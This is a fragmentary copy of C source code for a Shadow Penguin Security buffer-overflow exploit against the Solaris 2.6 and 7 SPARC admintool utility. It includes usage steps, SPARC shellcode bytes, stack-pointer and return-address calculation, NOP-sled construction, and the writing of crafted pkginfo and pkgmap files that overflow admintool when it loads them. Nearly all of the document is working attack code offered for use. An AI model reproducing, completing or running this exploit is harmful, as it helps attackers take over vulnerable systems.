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*==============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dmintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edit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he Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/55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Written by UNYUN (unewn4th@usa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[usage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% setenv DISPLAY=yourdisplay:0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% gcc ex_admintool.c (This example progra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% a.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( [Browse] -&gt; [Software] -&gt; [Edit] -&gt; [Add] -&gt; [Harddisk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-&gt; Directory: /tmp -&gt; [Ok]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n /tmp/EXP directory, the temp files are made, please remov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==============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include &lt;stdio.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include &lt;sys/utsname.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ADJUST1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ADJUST2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BUFSIZE1    1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BUFSIZE2    8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OFFSET      36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OFFSET2     4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PKGDIR      "mkdir /tmp/EXP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PKGINFO     "/tmp/EXP/pkginfo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PKGMAP      "/tmp/EXP/pkgmap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NOP         0xa61cc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 exploit_code[] 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2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68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90\x0b\x80\x0e\x92\x03\xa0\x0c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94\x10\x20\x10\x94\x22\xa0\x1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9c\x03\xa0\x14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ec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc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82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01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91\xd0\x20\x08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signed long get_sp(voi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asm__("mov %sp,%i0 \n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signed long ret_adr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ic char   x[500000]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    *fp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     i,vofs=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ct utsname nam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(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ame(&amp;name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f (strcmp(name.release,"5.7")==0) vofs=-904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ystem(PKGDIR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utenv("LANG=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f ((fp=fopen(PKGMAP,"wb"))==NULL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ntf("Can not write '%s'\n",PKGMAP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it(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close(fp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f ((fp=fopen(PKGINFO,"wb"))==NULL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ntf("Can not write '%s'\n",PKGINFO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it(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rintf(fp,"PKG=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t_adr=get_sp()-OFFSET+vof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ile ((ret_adr &amp; 0xff000000) == 0 |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ret_adr &amp; 0x00ff0000) == 0 |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ret_adr &amp; 0x0000ff00) == 0 |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ret_adr &amp; 0x000000ff) == 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ret_adr += 4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intf("Jumping address = %lx\n",ret_adr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mset(x,'a',4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(i = ADJUST1; i &lt; 1000; i+=4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3]=ret_adr &amp; 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2]=(ret_adr &gt;&gt;8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1]=(ret_adr &gt;&gt; 16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0]=(ret_adr &gt;&gt; 24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x[BUFSIZE1]=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uts(x,fp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rintf(fp,"\n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rintf(fp,"NAME=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mset(x,'a',4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(i = ADJUST2; i &lt; BUFSIZE2; i+=4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3]=NOP &amp; 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2]=(NOP &gt;&gt; 8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1]=(NOP &gt;&gt; 16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0]=(NOP &gt;&gt; 24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(i=0; i&lt;strlen(exploit_code); i++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ADJUST2+OFFSET2]=exploit_code[i]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x[BUFSIZE2]=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uts(x,fp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rintf(fp,"\n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rintf(fp,"VERSION=1.00\n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rintf(fp,"ARCH=sparc\n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rintf(fp,"CLASSES=none\n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rintf(fp,"CATEGORY=application\n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rintf(fp,"PSTAMP=990721\n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printf(fp,"BASEDIR=/\n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close(fp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ystem("admintool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